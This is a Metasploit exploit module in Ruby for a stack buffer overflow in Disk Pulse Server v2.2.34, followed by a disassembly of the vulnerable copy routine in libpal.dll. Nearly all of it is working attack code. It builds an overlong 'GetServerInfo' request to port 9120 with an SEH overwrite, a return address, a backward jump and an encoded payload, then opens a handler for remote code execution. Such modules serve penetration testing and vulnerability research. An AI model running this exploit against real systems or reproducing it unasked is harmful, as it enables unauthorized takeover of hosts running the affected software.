require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Disk Pulse Server \'GetServerInfo\' Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow vulnerability found in libpal.dll of Disk Pulse Server v2.2.34. The overflow is triggered when sending an overly long 'GetServerInfo' request to the service listening on port 9120. }, 'Author' => [ 'James Fitts' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: $', 'References' => [ [ 'BID', '43919' ], [ 'URL', '' ], [ 'URL', '' ] ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 300, 'BadChars' => "\x00\x0a\x0d\x20", 'DisableNops' => 'True', 'StackAdjustment' => -3500, 'Compat' => { 'SymbolLookup' => 'ws2ord', } }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP3 EN', { # p/p/r # libspp.dll 'Ret' => 0x1006f71f, 'Offset' => 303 } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 19 2010')) register_options([Opt::RPORT(9120)], self.class) end def exploit connect sploit = "GetServerInfo" sploit << "\x41" * 8 sploit << payload.encoded sploit << "\x42" * (303 - (8 + payload.encoded.length)) sploit << generate_seh_record(target.ret) sploit << make_nops(4) sploit << "\xe9\xc4\xfe\xff\xff" # jmp $-311 sploit << rand_text_alpha_upper(200) print_status("Trying target #{}...") sock.put(sploit) handler disconnect end end __END__ 0033C05C 55 PUSH EBP 0033C05D 8B6C24 1C MOV EBP,DWORD PTR SS:[ESP+1C] 0033C061 3AC2 CMP AL,DL 0033C063 74 14 JE SHORT libpal.0033C079 0033C065 3C 0D CMP AL,0D 0033C067 74 10 JE SHORT libpal.0033C079 0033C069 3C 0A CMP AL,0A 0033C06B 74 0C JE SHORT libpal.0033C079 0033C06D 41 INC ECX 0033C06E 88042F MOV BYTE PTR DS:[EDI+EBP],AL 0033C071 47 INC EDI 0033C072 8A0431 MOV AL,BYTE PTR DS:[ECX+ESI] 0033C075 84C0 TEST AL,AL 0033C077 ^75 E8 JNZ SHORT libpal.0033C061 0033C079 C6042F 00 MOV BYTE PTR DS:[EDI+EBP],0 0033C07D 5D POP EBP 0033C07E 5F POP EDI 0033C07F 890B MOV DWORD PTR DS:[EBX],ECX 0033C081 5E POP ESI 0033C082 B8 01000000 MOV EAX,1 0033C087 5B POP EBX 0033C088 C3 RETN